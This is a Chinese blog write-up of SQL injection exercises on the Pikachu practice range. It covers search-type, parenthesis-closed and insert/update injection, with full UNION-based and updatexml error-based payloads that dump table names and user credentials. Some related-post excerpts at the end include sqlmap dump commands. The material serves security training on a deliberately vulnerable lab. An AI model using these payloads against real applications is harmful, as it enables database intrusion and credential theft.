pikachu靶场SQL-Inject中的搜索型注入、xx型注入和“insert/update“注入

已于 2024-10-09 15:29:53 修改
阅读量254 收藏 10
点赞数 6
文章标签: sql 数据库 web安全 docker
于 2024-10-09 15:27:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42780280/article/details/142774211
版权

搜索型注入

输入in得到以下结果,参数直接拼接在URL中在这里插入图片描述输入in'有报错
在这里插入图片描述
输入in' '正常回显
在这里插入图片描述

可以用单引号闭合,http://ip:9002/vul/sqli/sqli_search.php?name=in&submit=%E6%90%9C%E7%B4%A2找到payload?name=in' &submit=%E6%90%9C%E7%B4%A2后开始注入

  1. 查列数为3
    ?name=in' order by 3-- &submit=%E6%90%9C%E7%B4%A2
  2. 查数据库名和版本
    ?name=in' union select database(),version(),1-- &submit=%E6%90%9C%E7%B4%A2
  3. 查表名
    ?name=in' union select group_concat(table_name),1,2 from information_schema.tables where table_schema=database()-- &submit=%E6%90%9C%E7%B4%A2
  4. 查列名
    ?name=in' union select group_concat(column_name),1,2 from information_schema.columns where table_schema=database()-- &submit=%E6%90%9C%E7%B4%A2
  5. 查用户数据
    ?name=in' union select username,password,level from pikachu.users -- &submit=%E6%90%9C%E7%B4%A2

xx型注入

输入vince得到以下查询结果,参数也同样直接拼接在URL中
在这里插入图片描述
输入vince'
在这里插入图片描述
输入vince')
在这里插入图片描述
添加注释符vince') -- 后正常回显vince的查询结果,则payload为?name=vince') -- &submit=%E6%9F%A5%E8%AF%A2,同样开始注入

  1. 查列数为2
    ?name=vince') order by 2-- &submit=%E6%90%9C%E7%B4%A2
  2. 查数据库名和版本
    ?name=vince') union select database(),version()-- &submit=%E6%90%9C%E7%B4%A2
  3. 查表名
    ?name=vince') union select group_concat(table_name),1 from information_schema.tables where table_schema=database()-- &submit=%E6%90%9C%E7%B4%A2
  4. 查列名
    ?name=vince') union select group_concat(column_name),1 from information_schema.columns where table_schema=database()-- &submit=%E6%90%9C%E7%B4%A2
  5. 查用户数据
    ?name=vince') union select username,password from pikachu.users -- &submit=%E6%90%9C%E7%B4%A2

"insert/update"注入

初始界面
在这里插入图片描述

insert注入

尝试万能密码未果,注册
在这里插入图片描述
注册后登录
在这里插入图片描述
再注册一个pika'有报错回显
在这里插入图片描述
抓包分析
在这里插入图片描述
提交值改为username=pika')-- &password=123&sex=&phonenum=&email=&add=&submit=submit
在这里插入图片描述
提交值改为username=pika','123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit回显注册成功的界面,接着使用报错注入使得数据显示在报错页面
构造注入语句

  1. 查数据库名

    username=pika' and updatexml(1,concat(0x7e,(select database()),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

    在这里插入图片描述

  2. 查表名

    username=pika' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

    有报错
    在这里插入图片描述
    换一个username之后可以查询

    username=111' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

    在这里插入图片描述

    但是没有完整显示,使用substr()函数使得返回的结果从第32位开始显示31位长度

    username=111' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),32,31),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

    在这里插入图片描述

  3. 查列名

    username=111' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

    同样也显示不完整,需要substr()函数

    username=111' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

  4. 查用户数据,需要substr()函数查看完整数据

    username=111' and updatexml(1,concat(0x7e,(select group_concat(id,':',username,':',password) from pikachu.users),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit
username=111' and updatexml(1,concat(0x7e,substr((select group_concat(id,':',username,':',password) from pikachu.users),32,31),0x7e),1),'123','','','','')-- &password=123&sex=&phonenum=&email=&add=&submit=submit

update注入

登录后的个人信息编辑界面
在这里插入图片描述
提交后抓包,可以看到提交的内容

sex=123&phonenum=123&add=123&email=123&submit=submit

在其中添加单引号,有报错

sex=123'&phonenum=123&add=123&email=123&submit=submit

在这里插入图片描述
构造payload

sex=123' and ' &phonenum=123&add=123&email=123&submit=submit
  1. 查数据库名
sex=123' and updatexml(1,concat(0x7e,(select database()),0x7e),1)  and '&phonenum=123&add=123&email=123&submit=submit
  1. 查表名(要用到substr()函数来获取完整数据)
sex=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)  and '&phonenum=123&add=123&email=123&submit=submit
  1. 查列名(要用到substr()函数来获取完整数据)
sex=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)  and '&phonenum=123&add=123&email=123&submit=submit
  1. 查用户数据(要用到substr()函数来获取完整数据)
sex=123' and updatexml(1,concat(0x7e,(select group_concat(id,':',username,':',password) from pikachu.users),0x7e),1) and '&phonenum=123&add=123&email=123&submit=submit
gjhaoiaao
关注
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 892
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
pikachu靶场-SQL-Inject
braty_的博客
02-23 1325
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
Pikachu靶场--Sql Inject
qq_65150735的博客
06-30 1134
Pikachu靶场--Sql Inject(SQL注入)
Pikachu靶场SQL-Inject之字符注入(基于报错)
witwitwiter的博客
05-09 609
Pikachu靶场SQL-Inject之字符注入(基于报错) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 技巧思路: 在MYSQL使用一些指定的函数来制造报错,从而从报错信息获取设定的信息。 select/insert/update/delete都可以使用报错来获取信息。 背景条件: 后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端。 updatexml():函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractval
pikachu靶场 SQL-inject
Al_1的博客
10-03 968
数字注入,字符注入搜索注入xx注入,增改注入,删除注入,请求头注入,布尔盲注,时间盲注,宽字节盲注
Pikachu靶场-SQL-Inject
若把此心以学道,即身成佛有何难
12-29 609
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 3116
sql注入
pikachu靶场通关-SQL-Inject
qq_43381463的博客
01-30 201
pikachu靶场通关-SQL-Inject
Pikachu漏洞靶场 Sql InjectSQL注入
柠檬i的博客
04-05 1149
哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5257
Pikachu靶场Sql
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1673
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1287
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞危害性最高的漏洞之一。形成的原因主要是在数据交互过程,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
pikachu靶场通关记录
weixin_45682839的博客
04-01 2726
pikachu靶场通关记录
pikachu靶场练习
qaq517384的博客
01-12 2552
pikachu靶场练习暴力破解基于表单的暴力破解 暴力破解 基于表单的暴力破解 随便输入一个用户名和密码,然后bp抓包 抓包送入intruder模块 选第四个模式 为账号和密码分别导入自己的字典,就可以start attack开始爆破了 根据相应的长度判断是否登陆成功 爆破出一个简单的账号密码:admin/123456 ...
毕业设计_基于springboot+layui+mybatisPlus的仓库物流管理系统源码+SQL+教程+可运行】41004
pingguocu3的博客
10-04 932
毕业设计--课程设计--springboot--java 登录管理员账号:system 密码:123456 验证码输入:注意验证码字母要大写。启动项目后运行http://locahost:8080跳转到登录界面即可。后端:springboot、mybatis-plus、shiro。application.yml文件数据库连接信息。运行sql目录下的warehouse.sql文件。1.基础管理:商品管理、客户管理、供应商管理;2.物流管理:进货管理、发货管理、交付管理...
实用SQL小总结
UntifA的博客
09-29 1539
SQL记录
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 588
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作的数值处理需求。
手写mybatis之SQL执行器的定义和实现
最新发布
CSDN_LiMingfly的博客
10-08 689
所有系统的设计和实现,核心都在于如何解耦,如果解耦不清晰最后直接导致的就是再继续迭代功能时,会让整个系统的实现越来越臃肿,稳定性越来越差。而关于解耦的实践在各类框架的源码都有非常不错的设计实现,所以阅读这部分源码,就是在吸收成功的经验。把解耦的思想逐步运用到实际的业务开发,才会让我们写出更加优秀的代码结构。设计。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值